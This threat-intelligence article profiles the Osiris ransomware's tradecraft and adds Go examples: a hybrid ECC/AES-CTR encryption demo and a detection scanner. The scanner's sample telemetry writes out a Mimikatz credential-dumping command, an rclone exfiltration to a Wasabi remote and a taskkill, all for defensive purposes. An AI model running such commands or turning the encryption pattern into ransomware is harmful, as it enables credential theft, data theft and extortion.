A new ransomware family, borrowing the name of the ancient Egyptian god of the dead, has emerged in a high-profile attack against a major food service franchisee in Southeast Asia. Dubbed Osiris, the threat was first spotted in November 2025. The intrusion combined legitimate administration and remote-access tools, well-known attacker utilities, and a malicious kernel driver to paralyze the victim's operations.
While the name might sound familiar to security veterans, investigators from the Threat Hunter Team (Symantec and Carbon Black) emphasize that this is a unique breed. “While this Osiris ransomware shares a name with a ransomware family from 2016… investigation found that this threat is unique and appears to be a completely new ransomware family”.
The origins of Osiris remain shrouded in mystery, but its tactics bear striking resemblances to known heavy hitters in the ransomware space. The attack chain suggests potential links, or at least shared tradecraft, with the Inc ransomware group.
Key overlaps include:
- Data Exfiltration: The attackers used Rclone to siphon data to a Wasabi cloud storage bucket, a tactic “previously used in October 2025 by Inc ransomware attackers”.
- Mimikatz Usage: A specific version of the credential-dumping tool Mimikatz, named kaz.exe, was deployed. This same filename and version were “previously used by attackers deploying the Inc ransomware,” hinting at a crossover in personnel or toolkits.
Additionally, the attack employed Poortry, a malicious driver previously favored by the Medusa ransomware gang. This driver masqueraded as a legitimate antivirus component and was used to disable security software from the kernel level, a classic “Bring Your Own Vulnerable Driver” (BYOVD) attack. Enforcing Microsoft's vulnerable driver blocklist and hypervisor-protected code integrity raises the bar for this class of attack, though a freshly signed driver may not yet appear on the blocklist, so alerting on unexpected driver loads remains necessary.
Osiris is not a blunt instrument; it is a precise tool designed for maximum disruption. It uses a “hybrid encryption scheme: ECC + AES-128-CTR,” generating a unique key for every file it locks.
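The report describes the scheme only as ECC + AES-128-CTR with a unique key per file. The Go program below is an added example, not code from the report, the Threat Hunter Team, or the malware itself; it shows the standard way such a hybrid scheme is built and why it frustrates recovery. The concrete choices (an ECIES-style construction over P-256, SHA-256 as the key-derivation function, the `LockedFile` layout) are assumptions for illustration; the malware's actual curve, KDF and on-disk format are not published. It needs Go 1.20 or later for `crypto/ecdh`.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/ecdh"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

// LockedFile is the metadata a hybrid scheme must keep next to each
// ciphertext: the per-file ephemeral public key and the CTR counter block.
// The layout is assumed; the report gives no format details.
type LockedFile struct {
	EphemeralPub []byte // uncompressed P-256 point, 65 bytes
	IV           []byte // 16-byte initial counter block
	Ciphertext   []byte
}

// ctrStream derives a 128-bit AES key from the ECDH shared secret (assumed
// KDF: bare SHA-256, truncated) and returns the CTR keystream for iv.
func ctrStream(shared, iv []byte) (cipher.Stream, error) {
	sum := sha256.Sum256(shared)
	block, err := aes.NewCipher(sum[:16])
	if err != nil {
		return nil, err
	}
	return cipher.NewCTR(block, iv), nil
}

// Encrypt locks one plaintext to the operator's public key. A fresh ephemeral
// key pair per call is what makes every file's AES key unique; the ephemeral
// private key is dropped as soon as the shared secret has been derived.
func Encrypt(operatorPub *ecdh.PublicKey, plaintext []byte) (LockedFile, error) {
	eph, err := ecdh.P256().GenerateKey(rand.Reader)
	if err != nil {
		return LockedFile{}, err
	}
	shared, err := eph.ECDH(operatorPub)
	if err != nil {
		return LockedFile{}, err
	}
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(iv); err != nil {
		return LockedFile{}, err
	}
	stream, err := ctrStream(shared, iv)
	if err != nil {
		return LockedFile{}, err
	}
	ct := make([]byte, len(plaintext))
	stream.XORKeyStream(ct, plaintext)
	return LockedFile{EphemeralPub: eph.PublicKey().Bytes(), IV: iv, Ciphertext: ct}, nil
}

// Decrypt recomputes the shared secret from the operator's private key and the
// stored ephemeral public key. Nothing left on the victim host can do this,
// which is why per-file keys on their own do not help recovery.
func Decrypt(operatorPriv *ecdh.PrivateKey, f LockedFile) ([]byte, error) {
	ephPub, err := ecdh.P256().NewPublicKey(f.EphemeralPub)
	if err != nil {
		return nil, err
	}
	shared, err := operatorPriv.ECDH(ephPub)
	if err != nil {
		return nil, err
	}
	stream, err := ctrStream(shared, f.IV)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(f.Ciphertext))
	stream.XORKeyStream(pt, f.Ciphertext)
	return pt, nil
}

// Demo encrypts a constructed plaintext twice and reports whether the
// operator key recovers it and whether the two ciphertexts differ (distinct
// per-file keys even for identical content).
func Demo(msg string) (recovered, perFileKeysDiffer bool, err error) {
	operator, err := ecdh.P256().GenerateKey(rand.Reader)
	if err != nil {
		return
	}
	f1, err := Encrypt(operator.PublicKey(), []byte(msg))
	if err != nil {
		return
	}
	f2, err := Encrypt(operator.PublicKey(), []byte(msg))
	if err != nil {
		return
	}
	pt, err := Decrypt(operator, f1)
	if err != nil {
		return
	}
	recovered = string(pt) == msg
	perFileKeysDiffer = !bytes.Equal(f1.Ciphertext, f2.Ciphertext)
	return
}

func main() {
	r, d, err := Demo("quarterly payroll export") // constructed sample plaintext
	fmt.Println("recovered:", r, "per-file keys differ:", d, "err:", err)
}
```

For an analyst, the practical consequence is that a free decryptor only becomes possible through implementation mistakes in the sample (a reused counter block, a weak random source for the ephemeral key, a key left recoverable in memory or on disk), so that is where reverse engineering effort belongs; the scheme as described is otherwise sound.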
Before encryption begins, the malware terminates critical processes so that target files are not held open by running applications. The kill list includes database services such as SQL Server and Oracle, as well as productivity apps such as Excel, Word, and Outlook.
“It creates a ransom note titled Osiris-MESSAGE.txt,” which directs victims to a negotiation chat, completing the classic extortion loop.
The emergence of Osiris signals that the ransomware landscape remains volatile and dangerous. “The impact this new Osiris ransomware will have on the ransomware landscape in general remains to be seen,” the report concludes. However, the sophisticated toolset suggests it is being “wielded by experienced attackers” who know exactly how to bypass modern defenses.
Organizations are advised to monitor for the specific tools used in this campaign, including Netscan, Netexec, and modified versions of Rustdesk, to catch the threat before encryption begins. Because Netscan and Rustdesk are legitimate tools, alerting should key on unexpected installs, unusual parent processes, and renamed binaries rather than on the file names alone.
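As an added illustration (not from the report or the Threat Hunter Team), the Go program below runs simple indicator rules over constructed endpoint telemetry covering the behaviours described above: the named tool executables, Rclone pushing to a Wasabi remote, a burst of `taskkill` against the database and Office processes on the kill list, and creation of the Osiris-MESSAGE.txt note. The event structure and sample events are constructed for the example, and the image names for Netscan, Netexec and RustDesk are assumed defaults.

```go
package main

import (
	"fmt"
	"strings"
)

// Event is a simplified endpoint telemetry record (process start or file
// create), modelled loosely on Sysmon-style fields. Constructed for this example.
type Event struct {
	Host    string
	Kind    string // "process" or "file"
	Image   string // executable file name for process events
	CmdLine string // full command line for process events
	Path    string // created path for file events
}

// toolImages maps executable names from the report to a short description.
// Assumption: default file names for Netscan, Netexec and RustDesk; attackers
// rename binaries, so pair this with hash and behaviour rules.
var toolImages = map[string]string{
	"rclone.exe":   "Rclone (exfiltration staging)",
	"kaz.exe":      "Mimikatz renamed to kaz.exe (Inc-linked file name)",
	"netscan.exe":  "Netscan network scanner",
	"netexec.exe":  "NetExec",
	"nxc.exe":      "NetExec",
	"rustdesk.exe": "RustDesk remote access",
}

// killListTargets are image-name fragments for the database and Office
// processes the report says Osiris terminates before encrypting.
var killListTargets = []string{"sqlservr", "oracle", "excel", "winword", "outlook"}

// Scan returns one alert line per indicator matched in the event stream.
func Scan(events []Event) []string {
	var alerts []string
	for _, e := range events {
		img := strings.ToLower(e.Image)
		cmd := strings.ToLower(e.CmdLine)
		switch e.Kind {
		case "process":
			if desc, ok := toolImages[img]; ok {
				alerts = append(alerts, fmt.Sprintf("%s: %s (%s)", e.Host, desc, e.Image))
			}
			// Rclone pushing to Wasabi, the exfiltration pattern the report ties
			// to Inc. The remote may be defined only in rclone.conf, so also watch
			// network telemetry for connections to *.wasabisys.com.
			if img == "rclone.exe" && strings.Contains(cmd, "wasabi") {
				alerts = append(alerts, fmt.Sprintf("%s: rclone transfer to a Wasabi remote", e.Host))
			}
			// Pre-encryption kill list: taskkill against a database or Office process.
			if img == "taskkill.exe" {
				for _, t := range killListTargets {
					if strings.Contains(cmd, t) {
						alerts = append(alerts, fmt.Sprintf("%s: taskkill against %s (kill-list behaviour)", e.Host, t))
						break
					}
				}
			}
		case "file":
			if strings.HasSuffix(strings.ToLower(e.Path), "osiris-message.txt") {
				alerts = append(alerts, fmt.Sprintf("%s: ransom note written at %s", e.Host, e.Path))
			}
		}
	}
	return alerts
}

// SampleEvents is constructed telemetry, not data from the report.
func SampleEvents() []Event {
	return []Event{
		{Host: "FS01", Kind: "process", Image: "rclone.exe",
			CmdLine: `rclone.exe copy D:\Shares wasabi:staging --config C:\Users\Public\r.conf`},
		{Host: "DC01", Kind: "process", Image: "kaz.exe",
			CmdLine: `kaz.exe "privilege::debug" "sekurlsa::logonpasswords" exit`},
		{Host: "WS07", Kind: "process", Image: "taskkill.exe",
			CmdLine: `taskkill /F /IM sqlservr.exe`},
		{Host: "WS07", Kind: "file", Path: `C:\Users\Public\Osiris-MESSAGE.txt`},
		{Host: "WS08", Kind: "process", Image: "notepad.exe", CmdLine: `notepad.exe notes.txt`},
	}
}

func main() {
	for _, a := range Scan(SampleEvents()) {
		fmt.Println(a)
	}
}
```

The ransom-note and kill-list rules fire late, once encryption is imminent; the tool and Wasabi rules are the ones that buy time, and in a real deployment they belong in the EDR or SIEM as queries over process-creation and network events rather than in a standalone program.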